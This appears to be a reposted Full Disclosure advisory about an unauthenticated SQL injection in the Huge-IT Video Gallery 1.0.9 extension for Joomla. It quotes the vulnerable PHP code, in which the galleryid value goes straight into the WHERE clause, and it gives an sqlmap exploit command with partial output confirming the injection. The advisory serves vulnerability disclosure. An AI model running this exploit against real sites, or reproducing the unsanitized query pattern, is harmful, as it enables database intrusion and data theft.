[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla

Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla Author: Larry W. Cashdollar, @_larry0 Date: 2016-09-15 Download Site: http://ift.tt/2dbJpd3 Vendor: www.huge-it.com, fixed v1.1.0 Vendor Notified: 2016-09-17 Vendor Contact: info@huge-it.com Description: A video slideshow gallery. Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php. Vulnerable Code in : ajax_url.php 11 define('_JEXEC',1); 12 defined('_JEXEC') or die('Restircted access'); . . . 28 if($_POST['task']=="load_videos_content"){ 29 30 $page = 1; 31 32 33 if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){ 34 $paramssld=''; 35 $db5 = JFactory::getDBO(); 36 $query5 = $db->getQuery(true); 37 $query5->select('*'); 38 $query5->from('#__huge_it_videogallery_params'); 39 $db->setQuery($query5); 40 $options_params = $db5->loadObjectList(); 41 foreach ($options_params as $rowpar) { 42 $key = $rowpar->name; 43 $value = $rowpar->value; 44 $paramssld[$key] = $value; 45 } 46 $page = $_POST["page"]; 47 $num=$_POST['perpage']; 48 $start = $page * $num - $num; 49 $idofgallery=$_POST['galleryid']; 50 51 $query = $db->getQuery(true); 52 $query->select('*'); 53 $query->from('#__huge_it_videogallery_videos'); 54 $query->where('videogallery_id ='.$idofgallery); 55 $query ->order('#__huge_it_videogallery_videos.ordering asc'); 56 $db->setQuery($query,$start,$num); CVE-2016-1000123 JSON: Export Exploit Code: • $ sqlmap -u 'http://ift.tt/2d3pdXg' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3 • . • . • . • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: •

Source: Gmail -> IFTTT-> Blogger